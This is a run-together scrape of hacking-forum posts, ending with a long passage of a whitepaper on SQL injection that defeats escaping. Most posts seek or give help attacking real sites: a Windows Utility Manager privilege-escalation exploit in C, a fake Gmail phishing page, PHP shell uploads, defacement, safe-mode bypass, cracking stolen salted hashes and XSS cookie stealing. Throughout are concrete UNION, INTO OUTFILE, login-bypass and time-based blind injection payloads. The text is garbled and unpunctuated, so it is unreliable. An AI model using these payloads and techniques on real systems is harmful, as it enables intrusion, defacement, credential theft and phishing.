sorry but i cant get what is the point of your question its all about n maybe thats why nothin answering your questionplease give more specific and detai.
goodbye c warning no newline at end of fil.
php is probably turned offphp flag engine offwhich is why php gets printed rather then parsed.
upload some picture to the server under your control then use that picture as avatar signature or bbcode image in target forum all users browsing that forum topic will leave traces to the log files in your server alternative way is just linking to your website best pics free movies etc and then look for logs even better you can try csrf tricks xss browser activex mozilla plugin java applet malware and similar stuff in real tim.
windows universal language utility manager exploit ms can someone please complie this for me i think its c i don t have time to study it c o r o m p u t e r crpt utility manager exploit v modified by kralor crpt it gets system language and sets windows names to work on any win k feel free to add other languages you know where we are c o r o m p u t e r original disclaimer by cesar cerrudo sqlsec at include struct int id char utilman char winhelp char open lang x c gestionnaire d utilitaires aide de windows ouvrir french x utility manager windows help open english void print lang int id char lang list neutral arabic bulgarian catalan chinese czech danish german greek english spanish finnish french hebrew hungarian icelandic italian japanese korean dutch norwegian polish portuguese romanian russian croatian serbian slovak albanian swedish thai turkish urdu indonesian ukrainian belarusian slovenian estonian latvian lithuanian farsi vietnamese armenian azeri basque fyro macedonian afrikaans georgian faeroese hindi malay kazak kyrgyz swahili uzbek tatar not supported punjabi gujarati not supported tamil telugu kannada not supported not supported marathi sanskrit mongolian galician the best konkani not supported not supported syriac not supported not supported divehi invariant printf s r n lang list id return int set lang void unsigned int lang usrlang sysidid lang sys primarylangid id id lang usr primarylangid id if lang usr lang sys printf warning user language differs from system language r n r n printf system print lang lang sys printf user print lang lang usr printf select id getch if id id printf wrong choice c leaving r n id exit if id printf system language r n return lang sys elseprintf user language r n return lang usr void banner system cls printf r n r n t crpt utility manager exploit v modified by kralor crpt r n printf t t t base code by cesar cerrudo r n printf t t t you know where we are r n r n return int main int argc char argv hwnd lhandle lhandle point point char cmd windir system cmd ex unsigned int iint lang idbanner printf gathering system language information r n lang id set lang printf ok language print lang lang id for i inull sleep sendmessage findwindow null lang i winhelp wm ime keydown vk return sleep find open file dialog windowlhandle findwindow lang i open get input box handle lhandle getdlgitem lhandle x c sleep set text to filter listview to display only cmd exe sendmessage lhandle wm settext lparam cmd sleep send return sendmessage lhandle wm ime keydown vk return get navigation bar handle lhandle getdlgitem lhandle x a send tab sendmessage lhandle wm ime keydown vk tab sleep lhandle findwindowex lhandlenull shelldll defview null get list view handle lhandle getdlgitem lhandle x sendmessage lhandle wm ime keydown x send c char sendmessage lhandle wm ime keydown x d send m char sendmessage lhandle wm ime keydown x send d char sleep popup context menu postmessage lhandle wm contextmenu sleep get context menu handle point x point y lhandle point sendmessage lhandle wm keydown vk down move down in menu sendmessage lhandle wm keydown vk down move down in menu sendmessage lhandle wm keydown vk return send return sendmessage lhandle wm close close open file dialog window sleep sendmessage findwindow null lang i winhelp wm close close open error findwindow null lang i utilman wm close close utilitymanager return.
if you don t have perl installed yet then try for example activeperl.
hii wanted to knowis there anyway i can hide my domain name for phishing i need to make use of my hosting plan but the problem is i don t want people to know my domain name so basically say if i made an fake gmail mydomain com fake gmail htmli want it to be either somethign by which i can completely hide my domain name.
what can i do with this erro.
this is how for eg gmail does that when you click download to a picture as attachment it downloads it and doesnt open it in the browser but what i was thinking of is this if you are a simple user on a forum where you have rights to upload pics zip files as attachment could you somehow fool the browser the mime type detection so that it lets you upload a php script thinking that its actually a jpeg.
look at the logs change every pass on this server etc.
im here i need search in my disk this shel.
i found a similar file i found files on target forum one file was dude tar gz and the other was bblite tar in both those files i find a whole lot of tpl files which kinda looks like a frame for the forum it s a very basic view of the admin panel and other elements of the forum is there any file in there that might help me to get admin access to the target forum the link for the file i downloaded was forum com templates bblite tar and dude tar g.
this is anoying where are you.
o you really could start from there it s the password for front page extensions search a cracker i really dont know what programs cracks front page password.
config php we don t like magic quotes no magic quotes en.
hey i m pretty stupid so could you break it down to me i m new to this.
nop this weakness is more like feature and is quite useless in case of smf.
yes i know this tool in all version is very complet.
download thi.
nope no software that i could find only open ports i know these dbs from connecting through another server.
ok next thing where i can find what i can do i doing this first time so its hard please get me on the wa.
yes i am in i managed to edit cokies just i dont know what i have to change in the template code i tired but then shows some errors.
many thank.
so i have some questions first one is about rfi if i have found rfi vuln site atleast i tihnk so what should i dot next i have made host and uploaded c in it and did something like this vulnsyte com index php page seems nothing happens for rfi there is not many tuts what i have found so im total newb to this what is moust common errors which lead to rfi it would be nice if u could show me exmples like in sql inj you have error in your sql syntax what is ussual next step on rfi always upload some shell script or something i dont kinda get it what should i know to undertstand better rfi o mby someone got some good tutoirals about this what i know i need to know all about victim ex what os is running is there php html or fp running ect rooting hmm yea totla for me would be nice if i get redir on some good tutorial something like rooting for n bs what it is what can i do with it ex so i hope i get some help with this thankyou.
yes there is a private school for programming thx you wana help memy english is very bad sorr.
i ve tried too same thing happens well maybe it s filtred anyway thanx ive noticed that lots of sites arent filtring user input.
hello everybody i target com news php newsid union select into outfile shell php access denied for user zbuxki using password yes also i tried a similar target com news php newsid union select hello world into outfile zbas html and didn t worked both access denied for user zbuxki using password yes so what are my possibilities to bypass this have waysmanners bye guys.
just fucking google ither.
hii got a shell from a bigg ass servertoo many sites can be defaced but i dont care bout all of em i jst want one of em and i dont wanna give up so i haven t access for writin on that s directorywell i think i must get root access for deface that siteeverything is ok but i cant get a back connect well i think the fuckin firewall stop it everybody can help me how can i solve this problem and wtf can i do.
you know if you don t know how to use an exploit you probably shouldn t be using them altogether they were originally intended for use by security analysts not script kiddies.
table and column names can be enumerated via information schema if mysql version is x or they must be bruteforced or guessed this hash you got it s old style mysql hash i will try to crack it and by the way as you can read mysql user table then you probably have file privileges too which means that you can try to read and write local files load file and into outfile.
there is two private rsa keys in case of gmail ssl connection one private key is somewhere in google servers and another in web client home pc and of course no private rsa keys ever will be sent over the wire and if you can t somehow steal one or both these private keys you can t decrypt sessiont keys used to encrypt actual data stream so bottom line only if you can break in to target s home pc and steal private key then you can read half of traffic coming from gmail server another example you have just hacked in to some webstore server and got private key from webserver let s assume that it s not password protected etc now if you sniff traffic between any clients and that compromised webserver then you are able to read traffic from client to webserver data from webserver to client remains encrypted there are of course mitm possibilities but that s another strory ssl is meant to be secure and it is as far as new security holes are not develope.
invisionfree they are specialized in free forum hosting and i am sure that security is there important factor so no easy hacking there that s my.
your website has no files right so it means that direct hacking is very unlikely to be succeed one can try to know ftp credentials bruteforce social engineering etc there can be day exploits for apache or even against linux kernel ip stack but still best chances are for attacking via neighbors attacker can find security hole in one of the websites colocated on same webserver as your site then final goal your website s defacement may be possible but that depends one can never be certai.
i m sure if i left this topicno one else will reply coz this kinda of topics and questions are useless n no onewill reply so hack and security is not like that like nowu decide to hack urtargetipb com so you will open a topicand asking for a program or bug or for hack ur target you have to start reading tut instead ofopening such topics my suggest is go and search in google for these vuln srfi lfi sql injection xss rfu rce which is common web application vulnerabilites and learn about them also beside this go and start programmingc c php and hey remember you can t hack a sitejust in night h pe this help good luc.
one is microsoft ole db provider for odbc drivers error e microsoft odbc sql server driver sql server select permission denied on object sysxlogins database master owner dbo the other ismicrosoft jet database engine error could not find file c windows system inetsrv master i was able to get the master columns sysusers master key i couldn t download the data i suppose that means i don t have the rights to download but just browse are my only options to bruteforce the dbo or sa account.
helloi try to get access to a wbb pl forum want to drop a shell first of all i already have full access to a mysql database which is running on my target server i also have read access to the forum database i am using navicat i have two super moderator accounts i have access to an gmx net account from one of the two admins its an apache fedora serverdo anyone maybe know how i can upload my shell php on this server s i already tryed several things but cant get it working is there maybe an exploit i could use hope you have a few new ideas on what i could try sry for my bad english i write my english examen in weeks but cant speak english lol.
you don t need single quotes here to get syntax right try using parentheses.
i ve never heard of a safe mode bypass but perhaps just because i m not that into deep with web cgi php toolkit u know.
only option is to bruteforce or using wordlists old good trial error method you need script or program for this and if secret folder has long name then it can be virtually impossible to reveal it.
i have successfully negotiated to the relevant tables and exported all of the usernames passwords etc to an excel file the passwords are hashed md and salt i have the salt information in a separate column now i have a few questions very n bish so i apologise in advance since i have the entire d base can i just modify it in some way to reveal all of the hashed passwords into plain text i am getting my head around rainbow tables i ran a sample of the md hashes through some of the online crackers but had no luck because of the salt i assume how to incorporate the salt information stored in the relevant column to support the cracking process i also have all of the plaintext private messages that were sent via the bulletin board that the sql file came from approx is there a technique for searching this data for particular strings if anybody has any other ideas and what to do i would love to hear them.
ok i was wondering do u or anybody have the exploit code to get the salt for vbbulletin or deluxebbi have a exploit her.
there is no easy way to this you can try educated guess or wordlist bruteforce methods and analyze target website html form source code post parameters naming tends to correlate with sql database schema namin.
and whene i try thi.
for ipb version and fina.
no help for me still the sameim using url encoder from winfosec but im sure thats not the proble.
commands for this tool posting them will be appricated do not say same as dos commandsi need more of the.
is there a security hole or bug in vbulletin.
seem to work but i am stupid the compromise post seemed to be japanese i don t understand anything i ll try on another machine edit when i try rm var log i ve no error message but when i try another ls var log all log are here duno why but i can do a more etc passwd but i can t no a rm command any idee.
fantastic u made me more crazy lol.
yes i like to know that too someone.
use vpnalso y u can use sock.
when i try to upload my php code it says that the game id is invali.
it s an l server aight anyways as already said if you have the mysql root s password you should find a way to run sql code on it because with root privs you can load file and select into outfile.
oksafter making some several probes whith some versions this is the result mercuryboard not affectedthn.
don t you know phpmyadmin basics select needed database left upper corner then in left you will see table names look for users table click it next you can browse user rows and copy paste needed info or better choice is export so you can have all userdata at once.
i can t see any interesting stuff you can do with xss here most useful security holes are local and remote file inclusions remote code executions and sql injections that s my opinio.
hey i have been able to get any hash using this exploit then log in with any user changing the cookie with firefox problem is when i log in as admin it quickly sends me back to the index with an error message you are not authorized enter this site however i am able to see pm s any ideas.
nordik i am unsure what you are trying to say you mean i put likeexploit pl host com folder ipb would appreciate your help.
ok i get it thanks for the replies i use mysql real escape string for security waraxe yes i use md but i only posted part of my cod.
for sql injection exploiting in mysql oracle mssql msaccess and postgresql databases will encode plaintext strings helping evade php magic quotes and other similar obstacles in way of sql injection exploitation design and layout will be improved in near future and of course feedback is welcome see y.
we all know this code is vunarable for sql injection.
here is little piece of php code.
let me explain better there is a lot of scripts out there and not everyone has their passwords convert to md some go into a flatfile or your sql database just as plain text and that s want i m looking for why waste your time trying to convert passwords when you could use a script made forum or a guestbook which requires member to register and get all the passwords from the database or flatfile with no effort do you see what i mean if you are thinking this is not true then you are wrong because i got a script from trendy website creator yep everyone who wants to get peoples password go hunt it down i m telling you a secret lol it shows you the passwords of your members accounts but its not a forum it s a automatic website creation tool for your members customers so here is the question again does anyone know of any script that will show the owner cause it will be put on a host i own so i have total control over it and any data it records the passwords set by the user of every account made on that forum or guestbook or better yet know how to remove the md code in the registered new user and explain how to set it so it instead adds plain text for the password then bthe md crap ok this changed from asimple newbie question to a better put on the thinking cap lol as i am asking you this question i am looking onlinefor scripts from really cheap poorly made companies and hoping iget lucky if i find anything i will share with all of you but if you know anything that can help please share your info with me i could use any help you have to offer i found this siimple forum script called chipmonk forum and here is the link wonder is anyone can tell me how to alter the reguser php so it inserts the users password as plain text looks a lot less crazy then phpbb or even smf i tried just copy the code for how it enters the info into the sql for name and that didnt work.
well i found this but its bit difficult to understand but at least they are working on it read all post on that topic and come back here and tell me if you got something else and what did you undertood seey.
my suggestion make your home computer to testing lab install then try to write your first hello world php script next get some old phpbb installation with known sql injection bugs and install to your test system and then try to hack your own computer you have then advantage to see exactly how sql injection and exploiting works you can follow phpbb source code line by line you can always print out debug data var dump something it is my believe that self learning by whitehat hacking your own test system is far more better way to achieve success then reading only theorethical stuff best way is to combine various learning ways read e books articles zines watch hacking videos those are very popular in this days try it yourself localhost and who knows maybe in one moment you will say eureka i just spotted whole new security bug in phpbb remember there are no shortcuts to whitehack grayhat blackhat knowledge and experience it involves lot s of time spent with testing trying learning reading but it is worth i.
i try and stay away form sql injection i really dislike it i prefer somthing more solid and that includes social engineering it is a valid form of hacking and it has served me well and solidly on many do you need any more information or should that suffice for now keep us informed we can always help out if you need further assistanc.
do a uname a to see what os is running then try to find a folder with rw access usually are the temp one then upload an exploit for the os or some software installed and gain root it worked for m.
not w r.
worked really well thank yo.
try adding a window so the script looks like.
hi thats the effect from the php cofiguration magic quotes gpc the magic quotes gpc configuration directive affects get post and cookie values if turned on value it s php will automagically become it s php more info.
oh yeah what a black hat you really don t know what are you saying.
hehe but how to compress tb to kb small hd.
try to combine the letter char coz google dont use case sensitive in contrary they just block the letter not in all form of character case sensitif try search fly n fly n see the differentit helps when im using my script to search viewtopic ph.
the password this file is compresed with password x.
tools download url code download it run use as rpvs exe bf f v aff rapport bf brute forcing variables f fast mode aff anti forum filter v verbose mode sessid varname define phpsessid varname only with aff rapport create file rapport txt with result what can i do with the rpvc help me q.
the is aspx sorry on my err they are in swdish this is my big rpoblem i m register you can join in with username tutinac and password sandzak in instlinger you have to write some stuffs in html and many thing what can be explitable wtf what is this you mean whata fu ck is this site one of the best sites in europe join in and watch on url maby you get some idea i m trying so many times but everytime without luck or without idea how to do sql injection and waraxe why you dont try to work on aspx and asp there is new portal aspnuke they is writen in asp but like nuke they are same adress aspnuke com this site download them i m see them on one site but i cant to run them because i need some other db i dont know but is very nic.
so does cygwin do the same thing as gcc.
yes true till u die there will no sql statement take effect its a rfi bug remote file inclusionread again slowlyregards y dip.
yes you would want a php file in this case i would get a php shell such as c c r etc using that you can find the config file of the server which will have database username and password in it then you can use that to connect to the database or just use the php shell to connect to the database if you don t have a shell just google there are plenty and yes just link to it like path authentication phpbb phpbb functions php pconfig auth phpbb path.
once more i want your hep first of all we got an sql injectable site where passwords can be retrieved because they are in plaintext and information schema command can be used now to get deeper i know that in this site there is a db where admin info passes etc are stored these passwords are md encrypted not plaintext like the passwords on the table i retrieved the thing is i know only one table name common guess how i can find other tables names too and something more using that.
ah i see tnx for the reply so there is not a way of listing the contents of directory.
hi guys i used the sql injection exploit.
using pokemon ce cd ca eed db rosanna b f d bf c d e a dolphins cdc c e f b feed ff ae edinburghand so on.
you need to read up some more on sql injections go on google look for a tutorial called sql injection attack end r.
secondary use mysql real escape string and maybe also addslashes for escaping user input to prevent code.
is there any exploit for thi.
so you have in your possession database dump well then you can try to crack md hashes or try to use them directly it all depends on many factors like phpbb version session handling specifics and so on my suggestion is to post here some md hashes and then let see are they crackabe or no.
any ideas left.
by the way i don t believe that this is an working exploit this seems to be some sort of fake to me first of all there are problems in ie and only in ie related to image parsing and possible script execution and in that case attacker must be able to upload some jpg gif picture to victim server and then if victim opens that malicious picture cut paste pic address to ie url bar then javascript can steal cookies but in this case you described picture is located outside of victim server domain so if you can get cookies then you will get cookies related to yoursite com domain or maybe there is something i miss probably no.
may be the file is coded if it is php it may be zend encryption.
question you cannot modify the database to show the plaintext passwords you need to crack the md hashes or install a logger on the site that logs the plaintext into a database file question rainbow tables are meant to be used with unsalted hashes the don t work unless you have a rainbow table for each specific salt which i doubt you need to import the md hash and the matching salt into a password cracker like the famous passwordspro question you can use an sql query with the like statement google is your friend.
i have been trying out password sniffing nothing serious just for a joke on a friend and i am wondering if i can decrypt the information sent over ssl i use wireshark and have all the packets so logically shouldn t i be able to use this to decrypt the sent app data unfortunately i cannot seem to find anything on the topic.
lol what about.
hello yes this is realy google blocks all inurl searches after a worm virus like santy a or skypi a or variants google put a filter in the search engine and this filter block all of this search recenment i publish two articles whith some details more but is in spanish if you like to look a poc for exploting this circunstance jus juasand what say the error you are infected by a spyware or virus this is realy or only is a momentany lapsus of reason.
google is blocking allinurl zboard zboard ph.
yeah about megs after i deleted some stuff original file size was megs.
stop fucking websites from my countr.
hisql injection works by passing sql statements to a web application trough cookie querystring or form parametersthis means you can embed you sql statement in cookie variables if the web app use cookies and read them in querystrings i e h t t p victim com some buggy script param my sql injection or in post requestsfor example if the script you re trying to attack execute the following sql statement select nick userid password admin from authors where userid request form uid you can pass a uid form variable as follow fakeid union select john doe evil password true from authors the resulting query will be select nick userid password admin from authors where userid fakeid union select john doe evil password true from authors because fakeid doesn t exist in the remote db the first select will return no recordset while the second will return the recordset composed by john doe evil password true this means you have forced the app to recover a user with uid doe and password evil password this means you can bypass the login procedur.
hey guysso i used a phpbb exploit to get ahold of the database name database username and password however the database host is localhost how can i connect to that database remotely cheer.
cookie stealer only works in firefox not ie or is the problem the part i used this i didnt use a gif file but a html file people who havent register at milw rm yet.
ok use ftp search for file config php and download it this file contains database name mysql username and password when you have this info let me know and i will show you next step.
fetch all rows in syslogins view and look for any users with useful privileges especially sysadmins there can be more of them besides sa next try openrowset.
hey hi look how to know all the files in the host when you have only site com.
i can see that vulnerable parameter is start so probably injection does occur in limit xy section of the sql query and in most cases it s not exploitable there is into outfile method and possible union too if there is no order by in use but still in most cases it s not exploitable if it s in limit part.
well for start i would examine that web site try to find as much as you can for that site applications that are running there components modules plugins installed for that application any javascript search for forms queries try to find a little bit about members that are responsible for running the site basicly any info that you can get will put you one step closer to your goal then google as much info as you can about stuff you finded try to search about for the specific application module whatever most importantly try to understand specific vulnerability it will be hard in the begining hell it will be hard later too but hacking is a game of patience persistance and sometimes really good nerves i hope that this is what you was looking for if you wanted to know on how to hack specific site nobody will help you there well maybe they will but then as specific questions and you just may get the answers p s sorry for my english it s not my native language but i hope you understand what i wanted to say good luck and have fu.
thank u guys hmm bit hard to understand this but i will try to learn this is not so easy as sql injection lol but i thought the same about sql inject when i didnt know anythin tnx in advice if u two or anybody got something more to say reply more info better succe.
so umm is there a way to overcome this i hacked several site s by finding validator php and could download the htaccess but there was no uname pass there or did i over look something.
hello guys can anybody tell me how to bypass safe mode on the server and nobody state coz i had some ways but the all got failed and i will put some links for this servers to deal with it o.
ok th.
dont you have to put something there path authentication phpbb phpbb functions php pconfig auth phpbb path where file goes.
hello i heared about this it website am really like iti have a question please i found sql error in aspi m trying to inject it now.
ey dude waxup why dont u try some js file i did it in that way and cookiestealer php works pretty cool look in da xss put some like thi.
there must be thousands on there most of them use perl some use php or python so please tell us which one you want to use and we can explain it for you.
so seeing that in order to update a table i need an sql injetion in update querry how can i search for update querries having a form on the website which creates a user and after that you have the option to change some of your information doesn t show us that there is an update querry behind that.
hi allhere is the link to the teaser of hakin magazine and this is the speacial issue connected with the sql injection you are interested to download it you have to register on free account.
very nice warax.
its never ever worth it to try bruteforcing a password form online that type of web traffic is noticed by both isps and website administrators unless you can put together a big list of proxies to intermingle its a fruitless endeavor.
thank you so much i can read it now the file itself wasnt much use to me but i d have never known that when i couldnt read it i ve had files like that before and could never read them so you have been a big help thank you.
shai tanyour side is offline you have a other big side for linux freebsd thanksclassic.
if i make or i get a valid pag.
thanks for replies i tried every sql client i could think of and none of them worked this server is mainly used for mysql and not a web server i used nmap to do a port scan and the only port open was which is probably ssh but couldn t connect w putty mrandersoni tried these on my localhost and couldn t get them to work and for load file wouldn t i need file privs but if i could get the select into outfile to work do something like this maybe but since this server isn t a webserver maybe it doesn t have ph.
i have a root mysql login but it s set host is only localhost i only have privs to use the select command with another login this password might match the ftp but i can t even connect to it or on http port ftp neither of these ports are open with select command i ve got the root login but i m stuck here any suggestions.
always this.
oh nice you where able to load the htpasswd did you have an lfi or sometype of shell access.
why please explain where you see i dont have file privileg.
nobody come on i can t do anything about that i am a noob because of this i want to learn it edit i try it in another way can please somebody suggest me a simple machines forum admin pass exploit and teach me how to use it only what i need to edit i now how to run it.
how do you try to run it should be simply php foo php or php f foo php forgot it.
hey that worked well thanks.
i really don t know what to do what exactly is it i have vbulletin and want to fix sql injection advice me something.
thnx dude many kisse.
hey guys i got a book called c programming for dummies and was doing pritty good intill i got to a point where it was telling me to make gcc to work with command prompt do ineed to download gcc or somthing because every time i would go through the steps it would never wor.
thanks for you i will tr.
ok then what can i do and that code injection you use.
thank you for you great help im testing it on my own site sometimes you will try to intentionally hack into your own system to find security flaws and fix them for you great wor.
if john failes e g due to lack of time backup your files and ask your rootserver provider for a resetor try some exploits from milw rm are some exploits for and mainlines they should work four you to.
url php order order by you have an error in your sql syntax check the manual that corresponds to your mysql server version for the right syntax to use near order by at line this is limit null there are ways to be able to limit the use of union statement following query.
that is lot of interesting stuff.
try it out and i can help you step by ste.
link down plz reuploa.
como.
hey i need some help herecan anyone tell me what kind of encriptation is this ca b dce d dcddaa ad db d it was in a html code if that means something i really need to know it thx a lo.
it looks coded any idea how to decode it i ve uploaded the file to a free file hosting sit.
i have a file which is a tar gz file i have unzipped it and opened it but it s unreadable example xng x vm v hbd rd d k n x a fu h o i h i a h kmz zd k j h i k k o zs h z tu does anyone know how i can open this file to make it readable complete noob her.
trying to upload shell on this site try into outfile and it dont work into outfile home local apache htdocs sites n netref net im text php nothong work someone can help me pleas.
beautiful htpasswd user pass was the same for his godaddy account t.
is this for or earlier i tried it on a board and it failed both ways.
htaccess protection thank you i was wondering wtf was happening.
this is no perl exploit you will need a php interpreter for executing this.
how to understand bruteforce and wordlists and maybe you can offer some kind of script or program.
this code by himself does not contain sql injection because of the single quotes surrounding input variables now most of the real world php enabled webservers are configured with magic quotes on so sql injection attempts will fail if and only if you encounter webserver with magic quotes off ten you can have sql injection case here if there is no additional php code responsible for input data sanitize in the last case you can try this username or limit and let the password be whatever you want then beause of the sql injection you will be loged on as first admin in table by the way php pcode wants post method so you need manually crafted html file for exploiting p s i figured it out that you asked question from webmaster s point of view not from attacker s so you want better code first of all don t use plaintext passwords in database better use salted md hashes.
new interesting whitepaper from unexpected sql injection when escaping is not enough by alexander andonov sir point mordred on gmail version last modified abstract we will look at several scenarios under which sql injection may occur even though mysql real escape string has been used there are two major steps at writing sql injection resistant code correct validation and escaping of input and proper use of the sql syntax failure to comply with any of them may lead to compromise many of the specific issues are already known but no single document mentions them all although the examples are built on php mysql the same principles apply to asp mssql and other combinations of languages and databases contents introduction and rationale installation getting to mysql real escape string integer values the return of the integer values hi what s your column name do you like my wildcard other databases and other issues a summary in plaintext about references introduction and rationalethere are many papers and articles about sql injection in dynamically built sql queries as opposed to prepared statements or stored procedures and even more about how to protect against it and yet web programmers continue to make crucial mistakes when writing their sql related code indeed there are cases not explicitly mentioned in the popular tutorials which have to be handled with care as the php documentation on mysql real escape string says this function must always with few exceptions be used to make data safe before sending a query to mysql this article attempts to enumerate the said exceptions and give a complete checkpoint list of protective measures we will identify some common points of failure and provide the right and in some occasions the commonly applied wrong solutions in hope that novice programmers and pen testers will learn to recognise them in their own code should they occur the given examples are designed to look like some common web related to finding and displaying user information on the other hand they are somewhat artificial in the sense that they are overly simplified some of the examples of sql injection will not work with more complex queries for example using order by and union require special parentheses syntax which is usually hard to achieve when trying to inject sql nevertheless if points of injection exist in your code a well versed attacker will benefit from them no matter how hostile to sql injection the surrounding query is we will not discuss the possible mitigation strategies for when sql injection occurs such as php and mysql configuration options data encryption etc but the reader is encouraged to read more on the subject we expect the reader to be familiar with the basics of php mysql interaction and have at least sketchy idea of what sql injection is the reference section provides some good pointers at the latter it must also be noted that many of the presented issues have been separately mentioned by security researchers before for example and both state the need of quotes around values the php manual mentions the like wildcards and lists both briefly advises against using dynamic table names installation article is accompanied by a collection of examples each offering a number of tests which can be run on a localhost server the practices displayed in the examples are only recommended in their part related to sql injection the rest of the code is hastily and lazily patched up to just do the job it displays sql errors in the html doesn t escape values taken from the database before displaying them either and the html itself is the most minimalistic ugly street html that would get rendered this is not a good example of coding style so don t mimic it i don t either this is done intentionally as not to distract the reader from the important code do try to understand and apply the measures against sql injection though and if you re interested in pen testing as well as web programming play with the provided injection vectors open db inc php with your favourite editor and write the correct database connection info in the database you selected for the test import the sql injection test sql file which contains a simple table schema with three rows of information load the index php in your browser and follow the examples as they are commented on in the article if you want to play with the url parameters outside of the given test cases click the new links to load the examples in new windows these scripts only on your local testing environment if you leave them on a publicly accessible host they and depending on the configuration the host itself will be exploited you ve been warned for the sake of self containment the essential snippets of code will also be inlined in the article the test table has the following data in it mysql select from sql injection test userid username password winnie pooh edward sanders christopher robin runquery query is a utility function that displays and runs the given query and displays either the returned error or all returned rows getting to mysql real escape string example finduser php username isset get u get u runquery select userid username from sql injection test where username username tests u winnie u edward u christopher u schneier u u or u union all select userid concat username password from sql injection test where example demonstrates the most basic wrong way of handling dynamic sql queries the url parameter u is expected to contain a username and the first four test links demonstrate how it works with existing and non existing names the fifth test a single  breaking  the basic test if the script is vulnerable or at least if it will break and as we see our example indeed tries to execute invalid sql test manipulates the query to list all possible users instead of just one and finally the union query in test lists all users along with their passwords example finduser fixed php username isset get u get u username mysql real escape string username runquery select userid username from sql injection test where username username the vulnerability here arises from the ability of the attacker to inject a single  closing the literal string and interpreting the rest of the user input as sql syntax the well known remedy to that is to escape all variables that will be included in the dynamic query with mysql real escape string example shows that the same attacks no longer work from now on we will escape our parameters with mysql real escape string and will observe how and when this fails to protect us from sql injection note that even incorrectly escaping with functions such as addslashes or the magic quotes functionality in php has similar effects integer values example viewprofile php userid isset get id get id userid mysql real escape string userid runquery select userid username from sql injection test where userid userid tests id id id id id id or id union all select userid concat username password from sql injection test where id union all select userid concat username char password from sql injection test where example accepts a numeric parameter userid and displays information about that user the first four tests as before demonstrate how the script is expected to behave and the th test shows that even the escaped parameter can raise an error the trouble here is that the query assumes that the parameter will be integer and so is written without quotes the attacker though doesn t need a breaking  whatever he enters goes directly to the query to be interpreted as sql syntax test manipulates the where clause into returning all user records as we can see from mysql real escape string prevents the success of injected queries that include quotes any such query can be rewritten in a way as not to use quotes though so test succeeds where failed example viewprofile fixed php userid isset get id get id userid mysql real escape string userid runquery select userid username from sql injection test where userid userid example viewprofile fixed php userid isset get id get id userid intval userid userid mysql real escape string userid runquery select userid username from sql injection test where userid userid there are two solutions to the problem either use quotes in the query as example does or convert the input value to int the most robust choice is shown in example where the two solutions are combined if the numeric value requirement is changed at some point in the future and the input parameter is no longer forced to be int the query will still be protected the reader must realise that input validation in our case making sure that what we expect to be an int is really int and escaping the parameter before giving it to the query are two different security steps in this particular case either one will suffice but in general for in depth security you must always do both also the two tasks will most probably be carried by two different subsystems in your real life code so the validating and escaping code will not be adjacent as displayed in this simplified case the topic is quite extensively covered by other authors so we will not pursue it further the return of the integer values example members php offset isset get o get o offset mysql real escape string offset runquery select userid username from sql injection test limit offset tests o o o o o o union all select username password from sql injection test limit example demonstrates another situation where integer values are used the offset and count parameters of the limit clause the script implements a simple pagination feature it displays a list of members in pages of accepting the starting offset in an url parameter having in mind the previous examples there is no surprise that the breaking  the th test really breaks the query and that in the th test a union based injection can give the attacker a list of usernames and their associated passwords example members fixed php offset isset get o get o offset intval offset runquery select userid username from sql injection test limit offset example members not fixed php offset isset get o get o if is numeric offset runquery select userid username from sql injection test limit offset tests o o x c the difference with the previous situation is that this integer value plays another role syntactic wise the two limit parameters require integer values so we may not use any quotes or any escaping mechanism other than intval or casting to int as in example it must be noted that using is numeric as for example old versions of the php manual advised in the validation part of the script is not a sufficient check and example shows two ways to break the query although no malicious sql code can be injected in this way the second of those test is interesting because while it is numeric from the php point of view it is a string literal sql for mysql this is only of academic interest in this situation though literals encoded in this manner and longer than four characters will not pass is numeric the other difference between examples and is that in the real world order by will most likely be used alongside the limit clause this will cause the union based injection not to work and the developer may decide the code is secure this is both naive and wrong one must always use proper escaping before inserting values in a dynamic sql query no matter what the query looks like the next section will explain how such hostile to sql injection queries can still be exploited and still need to get properly protected another robust way to avoid these kinds of mistakes is not to specify an offset in the script parameters but a page the script will then have to calculate the offset based on the count of items for each page and give it to the query the necessity for this calculation makes sure that the offset will be integer when it reaches the query hi what s your column name example members php order isset get o get o userid order mysql real escape string order runquery select userid username from sql injection test order by order tests o userid o username o password o honey eaten o o userid asc union all select username password from sql injection test order by userid o if select userid from sql injection test where username x e e and password x f f userid username o if select userid from sql injection test where username x e e and password x userid username so we ve seen attacks directed at php variables playing the roles of string values integer values and integer parameters to limit sometimes a lazy developer will want to make another part of her query dynamic the column names example shows a typical use we want to list all members and we want the user to choose a column on which to sort them tests are although the security minded should raise an eyebrow at test it uses a column name that is not in the query don t mind that for now test shows what happens if the table has no such column test shows that even though quotes are escaped they can still break the syntax of the query test attempts to use the union injection only to find that a correct use of union and order by requires parentheses around the two selects that we want union of which is not possible here because we have only a single point of injection so what can the attacker do the answer is blind sql injection since the attacker can t use quotes he must either use the hexadecimal format mentioned in the previous section or use a combination of concat and char test checks if there is a username winnie and password pooh and if so orders the results by userid if not by username this is the if mysql function not to be confused with the if statement of the stored routine syntax since the apparent order is by userid the attacker concludes that the statement he checked for is true test tries winnie and since the results are ordered by username the fact must be wrong example a members not fixed php order isset get o get o userid order mysql real escape string order runquery select userid username from sql injection test order by order tests o userid if select userid from sql injection test where username x e e and password x f f benchmark md username userid o userid if select userid from sql injection test where username x e e and password x benchmark md username userid the problem here seems similar to that in example the column name is not properly quoted the mysql manual states that the identifier  is the backtick indeed the proper quoting in example a stops the attack vectors in tests and what we can t stop is the attacker simply closing the backtick  injecting sql after the column name as mysql real escape string does not escape backticks as we noted union will not work after order by so the attacker resorts to another blind injection technique slowing the query on condition on my machine test takes about seconds meaning the tested condition is true whereas test finishes with no delay example b members fixed php order isset get o get o userid if in array order array userid username order userid runquery select userid username from sql injection test order by order the actual problem of the query is not just the quoting of the column name although it is a good style to always use proper quotes but the fact that user supplied input is used as a column name test with the non existent column should have been the alarm rising factor even before having a proof that an sql injection is possible example b shows a possible solution where only a fixed number of options are allowed note that the same applies for other identifiers and syntactic elements that a programmer may wish to dynamically copy from the input to a query such as table names column aliases asc desc keywords etc do you like my wildcard mysql and other databases has several matching operators that accept wildcard symbols or regular expressions these are most often used in processing search forms what this means is that within the sql query we have a part a wildcard or regexp matching sequence which behaves differently than the usual sql syntax for our tests we will do two things first an additional index with length is added on the username field second instead of returning results of the query we will use the explain syntax and observe how our index is used example c search php search isset get s get s if search search mysql real escape string search runquery explain select userid username from sql injection test where username like search tests s wi s wi example c shows a typical wildcard search of usernames our first test behaves as expected test result id select type table type possible keys key key len ref rows extra simple sql injection test range username username using where as we can see from the possible keys and key values our index named username was used for determining the result set we also notice that rows is 